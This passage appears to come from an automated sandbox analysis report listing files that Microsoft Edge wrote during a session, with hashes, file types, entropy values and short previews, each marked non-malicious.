                                                                                                                                                                                                                                                                                                                        SHA-256:FF39770F3CCB884375F9ECD1FB9A3E8055F3297B474B43A77C3D14177C465C63
                                                                                                                                                                                                                                                                                                                        SHA-512:DDEEE938EC46952BDA7BD8D11AC1EBFFA2944D3DA9A45E50379B15A4A222BE6BD9F052CBC5919189D1097D2173BAE1FC1ED38F7F739AB5888ED1A3C2F26A69E1
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326025114093","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):11755
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                                        MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                                        SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                                        SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                                        SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b15a122f-6c12-4aba-97f3-ccee8868625c.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):40504
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.561284608334108
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:DPsRpGW5y7pLGLP20W5wRhf4OG8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPwg34Irg2:DkjGOKcP20WaRhfVGu1jaBg3Vo/s/Blz
                                                                                                                                                                                                                                                                                                                        MD5:1362BE84AED6DB2D2C868DB1ABF34867
                                                                                                                                                                                                                                                                                                                        SHA1:C44D03884737203969750ECF2EAB63BA86930751
                                                                                                                                                                                                                                                                                                                        SHA-256:314216365CFE50E3ADD0597A585F98B6479756A8435C0E313A5C0DA85EB5BB6E
                                                                                                                                                                                                                                                                                                                        SHA-512:D82F9FA2FA295F466FCC5E10650EC1DFEBB5B426BD2FFA8B015B0DB46108FD354DEFB28E595F492ED9D94EE8A1CE56F3D1B24B47BF80C178302676551F67379F
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326023865607","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326023865607","location":5,"ma

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\bef4fb73-86f7-43e9-b326-15f13708b9ed.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d8716538-8b33-4722-b3d3-9609a3fb4b0b.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d9f2d48e-cb15-4ed9-b14d-0646112a9fc5.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):25012
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.5672836502774095
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:DPNR7GWQ0W5wRhf4vG8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPQ4Irgi6rwX7FpVtE:DFlGJ0WaRhfqGu1jaRVD/rJtE
                                                                                                                                                                                                                                                                                                                        MD5:D46F53C67C20F6E69D2A21CB58BFAA05
                                                                                                                                                                                                                                                                                                                        SHA1:C495574EF0FCA3EA4569857FC6287E254FBB0B17
                                                                                                                                                                                                                                                                                                                        SHA-256:482FBD85CD5FDA4B54A731B348637120D08A0D453312C440534C67E3A38B7827
                                                                                                                                                                                                                                                                                                                        SHA-512:FABAA7EBAD54035B0CD103685CC2D67C47D550993D0D0D264DA17200D18B11C2DC0D8202D901E3FBBBB08B802C29BFC8B3717074816D9EC79CF986233CF87CCC
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326023865607","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326023865607","location":5,"ma

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                                        MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                                        SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                                        SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                                        SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.06110844262001915
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:Gy0cXlI4K0cXlQ/p89XCChslotGLNl0ml/Vl/Vl/U8oQXmlXCUWls:C0+E0mBspEjVl/PnvoQW1
                                                                                                                                                                                                                                                                                                                        MD5:A70ADC7B7B10CE5E4098664813D06F9A
                                                                                                                                                                                                                                                                                                                        SHA1:58CE94BEFECB12F64F1CD8D22AA860274532BA2C
                                                                                                                                                                                                                                                                                                                        SHA-256:9C24CBCB87987D5A19065179CEBACD80EA9775A33B6CB8AB6270A7B8A3577E57
                                                                                                                                                                                                                                                                                                                        SHA-512:2D6439AE025B48815692C2D3C902F9F526FDD27C09A4DDD6AB8C40F166D6066D09504AEA674C5A4656CC7ED0CA43635AD126C19A8D8D2C1270915A2D6616439F
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:..-.....................zk......$J...V....z.....-.....................zk......$J...V....z...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):119512
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.7420500225474925
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:96:e6xLV0xNs/cNswO5NshNsaCqziWXDfWXDdzUzm5zn:pLV0sHQcapXDuXDDl
                                                                                                                                                                                                                                                                                                                        MD5:6ABC7BBF5E89EF19EE378A4B498AD28F
                                                                                                                                                                                                                                                                                                                        SHA1:78C6481AF03D0D08F91D804A7C1A3C3C0B58F4F7
                                                                                                                                                                                                                                                                                                                        SHA-256:723F6C22D5150A87078E2D69B54FD76EEA2F0BF6CD74D7DBCE2C97449E03B59C
                                                                                                                                                                                                                                                                                                                        SHA-512:5F7FE8B47FA85D91C285C193FEA9DC5B17A246BE4ED1F8CB7B2750578A7D0A3BA609F9152F0057C99ADA1C715F18F0CF47693D3A36D6490C757F5F950C15D72F
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:7....-..........$J...V....M7'.z.........$J...V..h.IR..4.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):4473
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.951931688421288
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:96:ZmWz4u/KSz4u/+HRK4Lz4u/Fd4Lz4u/FwK:Ou/Mu/+Eu/ju/f
                                                                                                                                                                                                                                                                                                                        MD5:F7713F6F11A97DD0EF7688EFC1F2F23C
                                                                                                                                                                                                                                                                                                                        SHA1:95A904BD1C5EA90B5C6FDC6A91EF1DDB4235D344
                                                                                                                                                                                                                                                                                                                        SHA-256:C27ED574A5E2FB9A185822683D798C533433856A9737667FBB9EC615769F9205
                                                                                                                                                                                                                                                                                                                        SHA-512:0FF9E074D1DAA657CF380460F0FD96AC1F309CF3083B0545622D48EAD20473A41758D8211BB68F2DB8FD4D61A1AF992A7FD05AE6FF85552A9838BE2C057DCA53
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:A..r.................20_1_1...1.,U.................20_1_1...1..$.0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................P@;...............#38_h.......6.Z..W.F.....i.......i............V.e.................b|.................021_download,afbfe55e-b491-42cb-a99f-d5006b2107b0......$afbfe55e-b491-42cb-a99f-d5006b2107b0................"...nhttps://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1...https://ucd17e98c22878db2872ebfcb27c.dl.dropboxusercontent.com/cd/0/get/CgAV6hxZ-A3hQzTu2Stg3LHFDeMnudBRIOasHxeY3jHwYLSfARGUmzl5s0_-fl

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.160561567425685
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LYL1qM+q2PN723oH+TcwtfrK+IFUt8OLYL1XZmw+OLYL1qMVkwON723oH+Tcwt5:7K1qM+vVaYeb23FUt8OK1X/+OK1qMV5d
                                                                                                                                                                                                                                                                                                                        MD5:66D289BDB7E9BC474AC2184B509570CE
                                                                                                                                                                                                                                                                                                                        SHA1:C90C12FB52B0FACCA087557635C8A98357B9AB09
                                                                                                                                                                                                                                                                                                                        SHA-256:D7FD60252506D0F94924D861B8CD8815BD487A868EF6CACD76E72086A5219CF3
                                                                                                                                                                                                                                                                                                                        SHA-512:9D9DD3EED9394617E3000AFECE27217D5F9CDDFE7A89E397151C4D00251C5A3AB0418AF3EBC5B79724A3F114E4B28DF4D8E745A850F082D971CCB912D9784E35
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:25.155 1c8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/10-12:40:25.155 1c8c Recovering log #3.2024/12/10-12:40:25.155 1c8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.160561567425685
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LYL1qM+q2PN723oH+TcwtfrK+IFUt8OLYL1XZmw+OLYL1qMVkwON723oH+Tcwt5:7K1qM+vVaYeb23FUt8OK1X/+OK1qMV5d
                                                                                                                                                                                                                                                                                                                        MD5:66D289BDB7E9BC474AC2184B509570CE
                                                                                                                                                                                                                                                                                                                        SHA1:C90C12FB52B0FACCA087557635C8A98357B9AB09
                                                                                                                                                                                                                                                                                                                        SHA-256:D7FD60252506D0F94924D861B8CD8815BD487A868EF6CACD76E72086A5219CF3
                                                                                                                                                                                                                                                                                                                        SHA-512:9D9DD3EED9394617E3000AFECE27217D5F9CDDFE7A89E397151C4D00251C5A3AB0418AF3EBC5B79724A3F114E4B28DF4D8E745A850F082D971CCB912D9784E35
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:25.155 1c8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/10-12:40:25.155 1c8c Recovering log #3.2024/12/10-12:40:25.155 1c8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):816
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.0647916882227655
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
                                                                                                                                                                                                                                                                                                                        MD5:3BE72D8D40752B3A97028FDB2931FABA
                                                                                                                                                                                                                                                                                                                        SHA1:A27EA4726857A948F0A4B074062B674469A9A371
                                                                                                                                                                                                                                                                                                                        SHA-256:3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
                                                                                                                                                                                                                                                                                                                        SHA-512:8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):346
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.152192807639036
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LYL9M+q2PN723oH+TcwtfrzAdIFUt8OLYLKMXZmw+OLYLHMVkwON723oH+TcwtS:7K9M+vVaYeb9FUt8OKKY/+OKHMV5OaY/
                                                                                                                                                                                                                                                                                                                        MD5:4AF3A51DD6B905256CD95D47CDC79B08
                                                                                                                                                                                                                                                                                                                        SHA1:D43BD5CFB73EBD73DC445150613E26614B3D2B40
                                                                                                                                                                                                                                                                                                                        SHA-256:A5EC2777209DD8DDE886540D9D4BCA95EE9041C2003879639CE9DCD2D2E040AC
                                                                                                                                                                                                                                                                                                                        SHA-512:F11AACB59EE68CDF8E64983852686C71EAC08648E0E6C47EC5183D22F5EDF4963A8954988CA944389287BFA795F91DACAA1D634B9605021EDE834F591A4D0118
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:25.132 1c8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/10-12:40:25.133 1c8c Recovering log #3.2024/12/10-12:40:25.152 1c8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):346
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.152192807639036
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LYL9M+q2PN723oH+TcwtfrzAdIFUt8OLYLKMXZmw+OLYLHMVkwON723oH+TcwtS:7K9M+vVaYeb9FUt8OKKY/+OKHMV5OaY/
                                                                                                                                                                                                                                                                                                                        MD5:4AF3A51DD6B905256CD95D47CDC79B08
                                                                                                                                                                                                                                                                                                                        SHA1:D43BD5CFB73EBD73DC445150613E26614B3D2B40
                                                                                                                                                                                                                                                                                                                        SHA-256:A5EC2777209DD8DDE886540D9D4BCA95EE9041C2003879639CE9DCD2D2E040AC
                                                                                                                                                                                                                                                                                                                        SHA-512:F11AACB59EE68CDF8E64983852686C71EAC08648E0E6C47EC5183D22F5EDF4963A8954988CA944389287BFA795F91DACAA1D634B9605021EDE834F591A4D0118
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:25.132 1c8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/10-12:40:25.133 1c8c Recovering log #3.2024/12/10-12:40:25.152 1c8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):120
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                                        MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                                        SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                                        SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
